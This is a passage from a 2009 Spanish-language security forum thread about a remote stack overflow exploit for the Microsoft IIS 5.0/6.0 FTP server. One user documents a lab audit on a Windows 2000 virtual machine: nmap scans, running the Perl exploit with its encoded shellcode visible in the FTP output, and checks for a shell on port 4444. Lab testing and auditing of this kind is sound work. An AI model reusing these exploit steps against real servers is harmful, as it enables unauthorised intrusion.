22:45:13 169.254.117.152 [1]MKD JUNK@C~~~~~~~~~~~~~~~~~~~~


Have fun!

-berz3k.

En línea

kamsky
Colaborador
***
Desconectado Desconectado

Mensajes: 2.219


Como no saban que era imposible, lo hicieron...


Ver Perfil
Re: Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploits (win2k sp4)
« Respuesta #1 en: 2 Septiembre 2009, 13:02 »

le la noticia esta maana, agujero gordito...
En línea

----NO HAY ARMA MS MORTFERA QUE UNA PALABRA BROTADA DE UN CORAZN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!
berz3k
Moderador
***
Desconectado Desconectado

Mensajes: 1.209



Ver Perfil
Re: Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploits (win2k sp4)
« Respuesta #2 en: 2 Septiembre 2009, 13:13 »

Yep, habra que actualizar algunas ACLs en FWs e IDS/IPS, los admins son lentos XD

-berz3k.
En línea

alexkof158


Desconectado Desconectado

Mensajes: 416


LOL


Ver Perfil
Re: Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploits (win2k sp4)
« Respuesta #3 en: 2 Septiembre 2009, 22:43 »

Yep, habra que actualizar algunas ACLs en FWs e IDS/IPS, los admins son lentos XD

-berz3k.

hey loco este exploir es para subir los priviligios a un ser que tenga instalado win xp, y tiene que tener permiso de write solo en c:??
y que signifia cuando te refieres a sp4
y esta vulnerabilidad ataka a un servidor ftp solamente?
 :rolleyes:
« Última modificación: 2 Septiembre 2009, 23:00 por alexkof158 » En línea

"noproxy"
berz3k
Moderador
***
Desconectado Desconectado

Mensajes: 1.209



Ver Perfil
Re: Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploits (win2k sp4)
« Respuesta #4 en: 3 Septiembre 2009, 12:03 »

@alexkof158
El exploit es esclusivo para win2k y win3k, los permisos deben ser dentro del FTP directory definidos en el IIS, el SP4 significa Service Pack4 , el bug funciona solamente en versiones vulnerables MS FTP.

-berz3k.


En línea

knobot

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploits (win2k sp4)
« Respuesta #5 en: 4 Septiembre 2009, 15:25 »

a ver , a ver que me entere bien, cuando terminas obtienes una shell remota con netcat no? entonces tienes privilegios de administrador cuando estas en la shell?
En línea

g0su

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Re: Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploits (win2k sp4)
« Respuesta #6 en: 4 Septiembre 2009, 17:24 »

Hola buenas,

ante todo presentarme que soy nuevo por estas tierras  ;-)

A ver he estado haciendo pruebas para realizar una auditoria de algunas mquinas con windows 2000 que administramos para comprobar si eran vulnerables.

Instale una mquina virtual con w2000 as y le met el SP4, habilite el servidor de FTP del IIS con acceso annimo con permisos de lectura y escritura.

A continuacin me baje el script (nse) de nmap que permite mostrar si la mquina es vulnerable, de esta forma evitaba ejecutar el exploit.


Suspiro:~ moxilo$ nmap 192.168.244.129

Starting Nmap 5.00 ( http://nmap.org ) at 2009-09-03 22:13 CEST
Interesting ports on 192.168.244.129:
Not shown: 989 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
25/tcp   open  smtp
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
443/tcp  open  https
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
1031/tcp open  iad2
3372/tcp open  msdtc

Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds


Despus de cenar me descargo el plugin de nmap y lo lanzo:
Suspiro:~ moxilo$ sudo cp IIS-FTP.nse /opt/local/share/nmap/scripts/IIS-FTP.nse
Suspiro:~ moxilo$ nmap -p 21 -sV 192.168.244.129 --script=IIS-FTP --script-trace

Starting Nmap 5.00 ( http://nmap.org ) at 2009-09-03 23:30 CEST
NSOCK (0.3340s) nsock_loop() started (timeout=50ms). 0 events pending
NSOCK (0.3340s) TCP connection requested to 192.168.244.129:21 (IOD #1) EID 8
NSOCK (0.3340s) nsock_loop() started (timeout=50ms). 1 events pending
NSOCK (0.3340s) Callback: CONNECT SUCCESS for EID 8 [192.168.244.129:21]
...
SOCK (5.0860s) nsock_loop() started (timeout=50ms). 1 events pending
NSOCK (5.1370s) nsock_loop() started (timeout=50ms). 1 events pending
NSOCK (5.1880s) nsock_loop() started (timeout=50ms). 1 events pending
NSOCK (5.2380s) nsock_loop() started (timeout=50ms). 1 events pending
NSOCK (5.2890s) nsock_loop() started (timeout=50ms). 1 events pending
NSOCK (5.3390s) Callback: READ TIMEOUT for EID 66 [192.168.244.129:21]
NSOCK (5.3400s) nsock_loop() started (timeout=50ms). 0 events pending
NSE: TCP 192.168.244.1:54540 > 192.168.244.129:21 | CLOSE
Interesting ports on 192.168.244.129:
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd 5.0
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 5.34 seconds


El nmap me dice que no es vulnerable, algo que me extraa por que mi ftp cumple todos mis requisitos.

Comprobamos que realmente es tengo permisos de escritura de forma anonima:


Suspiro:~ moxilo$ ftp 192.168.244.129
Connected to 192.168.244.129.
220 moxilo-xef7jmub Microsoft FTP Service (Version 5.0).
Name (192.168.244.129:moxilo): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 Anonymous user logged in.
Remote system type is Windows_NT.
ftp> mkdir hola
257 "hola" directory created.
ftp> ls
500 'EPSV': command not understood
227 Entering Passive Mode (192,168,244,129,4,12).
125 Data connection already open; Transfer starting.
09-03-09  11:15PM       <DIR>          hola
226 Transfer complete.
ftp> quit
221 


Lanzo el exploit:

Suspiro:~ moxilo$ perl msftp.pl 192.168.244.129 192.168.244.1
IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2
220 moxilo-xef7jmub Microsoft FTP Service (Version 5.0).
331 Password required for anonimoos.
500 'PASS T00WT00W?޽-盟+ɱV?t$?Z???1jj?gw?ݘ??T}?*???@[qH?????N?p8f?_??????2?!?뙐V??(WOk/????V?????1b_>?^?"?P???\?? Z?Z?????e+=D??t"Mmz?)??A???-??u?u?j?C??..HR'?fm?b??-????wNɜ??4/??Kb??r?!?"s?z?3J?????B??-u6???R]?
                                                                    ˟ʄl?8?%vt??y??P?-?"4?4Z?
                                                                                            ???`$??qIL?-$ʷ??J?٪? ?3U?#??O{??=?븗?,nRu+o???R???R???O??Z?W&R:??CZ
                h?Bem?ĕm??????': command not understood
331 Password required for anonimoos.
500 'PASS T00WT00W?޽-盟+ɱV?t$?Z???1jj?gw?ݘ??T}?*???@[qH?????N?p8f?_??????2?!?뙐V??(WOk/????V?????1b_>?^?"?P???\?? Z?Z?????e+=D??t"Mmz?)??A???-??u?u?j?C??..HR'?fm?b??-????wNɜ??4/??Kb??r?!?"s?z?3J?????B??-u6???R]?
                                                                    ˟ʄl?8?%vt??y??P?-?"4?4Z?
                                                                                            ???`$??qIL?-$ʷ??J?٪? ?3U?#??O{??=?븗?,nRu+o???R???R???O??Z?W&R:??CZ
                h?Bem?ĕm??????': command not understood
331 Anonymous access allowed, send identity (e-mail name) as password.
230 Anonymous user logged in.
257 "w00t30669" directory created.
500 'SITE KSEXY?????r?_WYIIIICCCCCCQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIE6MQHJKODOG2F2BJC2F8HMFNGLEUQJD4JOH8F4P0FPPWLKKJNOD5JJNOCEKWKOM7AAVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV': command not understood
500 'SITE KSEXY?????r?_WYIIIICCCCCCQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIE6MQHJKODOG2F2BJC2F8HMFNGLEUQJD4JOH8F4P0FPPWLKKJNOD5JJNOCEKWKOM7AAVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV': command not understood
500 'SITE KSEXY?????r?_WYIIIICCCCCCQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIE6MQHJKODOG2F2BJC2F8HMFNGLEUQJD4JOH8F4P0FPPWLKKJNOD5JJNOCEKWKOM7AAVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV': command not understood
500 'SITE KSEXY?????r?_WYIIIICCCCCCQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIE6MQHJKODOG2F2BJC2F8HMFNGLEUQJD4JOH8F4P0FPPWLKKJNOD5JJNOCEKWKOM7AAVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV': command not understood
500 'SITE KSEXY?????r?_WYIIIICCCCCCQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIE6MQHJKODOG2F2BJC2F8HMFNGLEUQJD4JOH8F4P0FPPWLKKJNOD5JJNOCEKWKOM7AAVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV': command not understood
250 CWD command successful.
257 "CCC?UURU5UUUU@?8SEXYu?@@@@??C~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??EEEE{0?w~??HHHHIIII~??JKKK?c???NNNN" directory created.
200 PORT command successful.
150 Opening ASCII mode data connection for file list.

Ahora conecto al ftp a ver si me lo ha creado:


Suspiro:~ moxilo$ ftp 192.168.244.129
Connected to 192.168.244.129.
220 moxilo-xef7jmub Microsoft FTP Service (Version 5.0).
Name (192.168.244.129:moxilo): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 Anonymous user logged in.
Remote system type is Windows_NT.
ftp> ls
500 'EPSV': command not understood
227 Entering Passive Mode (192,168,244,129,4,13).
125 Data connection already open; Transfer starting.
09-03-09  11:15PM       <DIR>          hola
09-03-09  11:24PM       <DIR>          w00t30669
226 Transfer complete.
ftp> cd W00t30669
250 CWD command successful.
ftp> ls
227 Entering Passive Mode (192,168,244,129,4,15).
125 Data connection already open; Transfer starting.
09-03-09  11:24PM       <DIR>          CCC?UURU5UUUU@?8SEXYu?@@@@??C~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??~??EEEE{0?w~??HHHHIIII~??JKKK?c???NNNN
226 Transfer complete.
ftp> cd CCC\270UURU5UUUU@\2018SEXYu\367@@@@\377\340C~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?~\361\372^?EEEE{0\344w~\361\372^?HHHHIIII~\361\372^?JKKK\351c\376\377\377NNNN: El sistema no puede hallar el archivo especificado.
ftp>



En windows sigo sin puerto abierto (y tampoco usuario):

C:\>netstat -an | find "4444"

C:\>

Por tanto lanzo las distintas versiones del exploit y ni se crea usuario y tampoco se abre el puerto 4444.
En línea

g0su

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Re: Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploits (win2k sp4)
« Respuesta #7 en: 5 Septiembre 2009, 13:18 »

Nada, lo dejo por imposible, empiezo a pensar que es por que lo estoy probando sobre una mquina virtual  :-(.

He probado a cambiar las locales por si al enviar los datos el perl traduca incorrectamente los caracteres y los mandaba con UTF8 y el ftp lo entenda incorrectamente. Asi que listo las locales instaladas en mi mquina y paso de UTF8 a ISO8859-1(sin euro):

Citar
Suspiro:Desktop moxilo$ export LC_ALL="es_ES.ISO8859-1"
Suspiro:Desktop moxilo$ export LANG="es_ES.ISO8859-1"
Suspiro:Desktop moxilo$ locale
LANG="es_ES.ISO8859-1"
LC_COLLATE="es_ES.ISO8859-1"
LC_CTYPE="es_ES.ISO8859-1"
LC_MESSAGES="es_ES.ISO8859-1"
LC_MONETARY="es_ES.ISO8859-1"
LC_NUMERIC="es_ES.ISO8859-1"
LC_TIME="es_ES.ISO8859-1"
LC_ALL="es_ES.ISO8859-1"

Me instalo el WinDump (la versin win de tcpdump) y lo lanzo para que pille todo el trfico del ataque. Me encuentro con el problema que al ser una ***** de consola de win no me deja redireccionar la salida estandar contra un fichero (o por lo menos yo no se hacerlo ;) ) as que lo paso a un fichero de nombre trace pero con el inconveniente de que no me graba el payload de los paquetes:

C:\>WinDump.exe -i 2 -A -w trace dst port 21 and src host 192.168.244.1

Lo paso a mi mquina por samba:

Suspiro:Desktop moxilo$ tcpdump -r trace > resultado
Suspiro:Desktop moxilo$ cat resultado

Citar
12:55:36.228146 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags , seq 2623535093, win 65535, options [mss 1460,nop,wscale 3,nop,nop,TS val 425386696 ecr 0,sackOK,eol], length 0
12:55:36.228465 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [.], ack 3694908465, win 65535, options [nop,nop,TS val 425386696 ecr 0], length 0
12:55:36.228948 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [.], ack 59, win 65535, options [nop,nop,TS val 425386696 ecr 8599], length 0
12:55:36.229371 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [P.], ack 59, win 65535, options [nop,nop,TS val 425386696 ecr 8599], length 16
12:55:36.229581 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [.], ack 97, win 65535, options [nop,nop,TS val 425386696 ecr 8599], length 0
12:55:36.231132 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [P.], ack 97, win 65535, options [nop,nop,TS val 425386696 ecr 8599], length 384
12:55:36.231367 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [.], ack 511, win 65535, options [nop,nop,TS val 425386696 ecr 8599], length 0
12:55:36.233214 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [P.], ack 511, win 65535, options [nop,nop,TS val 425386696 ecr 8599], length 16
12:55:36.233865 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [.], ack 549, win 65535, options [nop,nop,TS val 425386696 ecr 8599], length 0
12:55:36.233879 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [P.], ack 549, win 65535, options [nop,nop,TS val 425386696 ecr 8599], length 384
12:55:36.234066 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [.], ack 963, win 65535, options [nop,nop,TS val 425386696 ecr 8599], length 0
12:55:36.234176 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [P.], ack 963, win 65535, options [nop,nop,TS val 425386696 ecr 8599], length 16
12:55:36.234309 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [.], ack 1035, win 65535, options [nop,nop,TS val 425386696 ecr 8599], length 0
12:55:36.234419 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [P.], ack 1035, win 65535, options [nop,nop,TS val 425386696 ecr 8599], length 16
12:55:36.235058 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [.], ack 1066, win 65535, options [nop,nop,TS val 425386696 ecr 8600], length 0
12:55:36.235232 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [P.], ack 1066, win 65535, options [nop,nop,TS val 425386696 ecr 8600], length 15
12:55:36.256023 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [.], ack 1102, win 65535, options [nop,nop,TS val 425386696 ecr 8600], length 0
12:55:36.256412 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [P.], ack 1102, win 65535, options [nop,nop,TS val 425386696 ecr 8600], length 507
12:55:36.257214 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [.], ack 1639, win 65535, options [nop,nop,TS val 425386696 ecr 8600], length 0
12:55:36.257221 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [P.], ack 1639, win 65535, options [nop,nop,TS val 425386696 ecr 8600], length 507
12:55:36.258098 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [.], ack 2176, win 65535, options [nop,nop,TS val 425386696 ecr 8600], length 0
12:55:36.258474 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [P.], ack 2176, win 65535, options [nop,nop,TS val 425386696 ecr 8600], length 507
12:55:36.265575 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [.], ack 2713, win 65535, options [nop,nop,TS val 425386696 ecr 8600], length 0
12:55:36.265589 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [P.], ack 2713, win 65535, options [nop,nop,TS val 425386696 ecr 8600], length 507
12:55:36.266220 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [.], ack 3250, win 65535, options [nop,nop,TS val 425386696 ecr 8600], length 0
12:55:36.266227 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [P.], ack 3250, win 65535, options [nop,nop,TS val 425386696 ecr 8600], length 507
12:55:36.266471 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [.], ack 3787, win 65535, options [nop,nop,TS val 425386696 ecr 8600], length 0
12:55:36.267106 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [P.], ack 3787, win 65535, options [nop,nop,TS val 425386696 ecr 8600], length 15
12:55:36.267906 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [.], ack 3816, win 65535, options [nop,nop,TS val 425386696 ecr 8600], length 0
12:55:36.267913 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [P.], ack 3816, win 65535, options [nop,nop,TS val 425386696 ecr 8600], length 215
12:55:36.271801 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [.], ack 4049, win 65535, options [nop,nop,TS val 425386696 ecr 8600], length 0
12:55:36.271812 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [P.], ack 4049, win 65535, options [nop,nop,TS val 425386696 ecr 8600], length 27
12:55:36.272038 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [.], ack 4079, win 65535, options [nop,nop,TS val 425386696 ecr 8600], length 0
12:55:36.272147 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [P.], ack 4079, win 65535, options [nop,nop,TS val 425386696 ecr 8600], length 221
12:55:36.272518 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [.], ack 4134, win 65535, options [nop,nop,TS val 425386696 ecr 8600], length 0
12:55:45.802533 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [F.], seq 3860, ack 4134, win 65535, options [nop,nop,TS val 425386792 ecr 8600], length 0
12:55:46.079158 IP 192.168.244.1.49681 > 192.168.244.129.ftp: Flags [R], seq 2623538955, win 0, length 0

Como sin payload no puedo entender que es lo que intenta hacer realmente el exploit me bajo el wireshark pero al intentar seleccionar la interfaz me da un desbordamiento de pila... intento usar el de mi mquina pero no es capaz de capturar desde la interfaz virtual vmware por lo que me es imposible leer con calma el payload... que mal funciona vmware en mac dios... as que aqu me quedo... si no consigo un pc antiguo donde poner w2000 para hacer las pruebas poco ms podr hacer.

Si alguien sabe algo que me lo comente que yo lo dejo por perdido xD
En línea

Ari Slash


Desconectado Desconectado

Mensajes: 1.788



Ver Perfil WWW
Re: Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploits (win2k sp4)
« Respuesta #8 en: 5 Septiembre 2009, 14:17 »

waau excelente info  ;D


salu2
En línea

berz3k
Moderador
***
Desconectado Desconectado

Mensajes: 1.209



Ver Perfil
Re: Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploits (win2k sp4)
« Respuesta #9 en: 8 Septiembre 2009, 09:12 »

@g0su

Muy raro lo que pasa en tu panorama, las pruebas antes posteados fueron ejecutadas directamente de a vmware (virtuales), tadas las versiones del exploit me han funcionado bien, para muestra tambien esta el video offensive-security, aun asi tambien ha algunos colegas les ha fallado y "cumplen" con todo los detalles para ser explotado, me montare un esquema bajo otro permisos FAT32, ya les cuento.

-berz3k.
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines